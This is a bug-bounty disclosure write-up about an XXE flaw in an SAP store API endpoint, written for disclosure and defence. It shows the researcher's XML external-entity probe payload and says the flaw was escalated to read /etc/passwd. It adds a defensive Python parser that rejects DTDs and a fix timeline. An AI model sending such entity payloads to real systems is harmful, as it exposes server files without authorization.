An interesting XXE in SAP.

Hello Folks!

Let me introduce myself to the community. I’m Zain Sabahat, a Security Researcher and Bug Bounty Hunter from Pakistan. Since I have learned a lot from reading write-ups, I have decided to play my role in giving back to the community. I will be disclosing some of my best findings in a series of write-ups.

Today I will be disclosing an XXE — XML External Entity vulnerability I discovered in SAP’s subdomain https://store.sap.com.

During my recon, I came across a store subdomain. When I opened https://store.sap.com it redirected me to https://store.sap.com/sap/cpa/ui/resources/store/html/StoreFront.html. During the loading of that page, a set of GET and POST requests were sent. One of the POST requests, to the /sap/cpa/api/getSolutions endpoint, caught my attention.

I manipulated the POST data to:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "Zain Here"> ]><SolutionListRequest><Facets><FacetType><Code/><Value/></FacetType></Facets><ListingType>2</ListingType><CountryCode>US</CountryCode><RetrieveAllDetailsIndicator>1</RetrieveAllDetailsIndicator><RetrieveFacetsIndicator/><RowCount>24&xxe;</RowCount><RowIndex>1</RowIndex><SearchText/><SolutionGroup/><SolutionTypeIndicator/><CategoryID/><RecommenderPageIndicator/><ResellerID/><ShoppingCartID/><CompanyID/><EndCustomerAddressID/><UserRoleCode/></SolutionListRequest>

in order to check if it was vulnerable to XXE or not.

Verified the presence of XXE

When I saw my name printed out in the response I got very happy and decided to exploit it further. I crafted the POST request in order to print out the contents of the "/etc/passwd" file.

Successfully printed out /etc/passwd file
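The fix on the server side is to never let a request body declare a DTD, because without a DOCTYPE no entity (internal or external) can be defined and the reference in RowCount is never expanded. The following is an added example written for this write-up, not SAP's code: a parser for the SolutionListRequest body above, built on Python's stdlib expat, that aborts as soon as a DOCTYPE or entity declaration appears. The request bodies are constructed from the payload shown above.

```python
"""Parse a SolutionListRequest body while refusing any DTD (the XXE mitigation)."""
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when the request body carries a DOCTYPE or an entity declaration."""


def parse_solution_list_request(body: str) -> dict:
    """Return {element name: text} for every leaf element with text content.

    A DOCTYPE (or any <!ENTITY ...>) aborts parsing before entity references
    such as &xxe; could ever be resolved or reflected back to the client.
    """
    parser = xml.parsers.expat.ParserCreate()
    fields, buf = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed in a request body")

    def entity_decl(*args):  # belt and braces: no entity may be declared at all
        raise DoctypeForbidden("entity declarations are not allowed in a request body")

    def start_element(name, attrs):
        buf[:] = []

    def char_data(data):
        buf.append(data)

    def end_element(name):
        value = "".join(buf).strip()
        if value:
            fields[name] = value
        buf[:] = []

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(body, True)  # exceptions raised in handlers propagate out of Parse
    return fields


def rejects_dtd(body: str) -> bool:
    """True if the body was refused because it declares a DTD, False if it parsed."""
    try:
        parse_solution_list_request(body)
    except DoctypeForbidden:
        return True
    return False


# Constructed inputs: the write-up's payload (external entity reflected via RowCount) and a clean body.
XXE_REQUEST = ('<!DOCTYPE foo [<!ENTITY xxe SYSTEM "Zain Here"> ]><SolutionListRequest>'
               '<ListingType>2</ListingType><CountryCode>US</CountryCode>'
               '<RowCount>24&xxe;</RowCount><RowIndex>1</RowIndex></SolutionListRequest>')
CLEAN_REQUEST = ('<SolutionListRequest><Facets><FacetType><Code/><Value/></FacetType></Facets>'
                 '<ListingType>2</ListingType><CountryCode>US</CountryCode>'
                 '<RowCount>24</RowCount><RowIndex>1</RowIndex></SolutionListRequest>')
```

The same refusal is what hardened libraries (e.g. defusedxml) implement; a regex on `<!DOCTYPE` is a weaker gate because the parser, not the string, decides what counts as a declaration.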

Timeline:

Jun 26, 2017 — Reported to SAP.

Jul 17, 2017 — Triaged.

Feb 13, 2018 — Fixed.

April 10, 2018 — Added to Hall Of Fame.

It took them almost a year to fix because the bug was in an internal component that was hard to replace.

Thanks for reading! Stay tuned for more write-ups!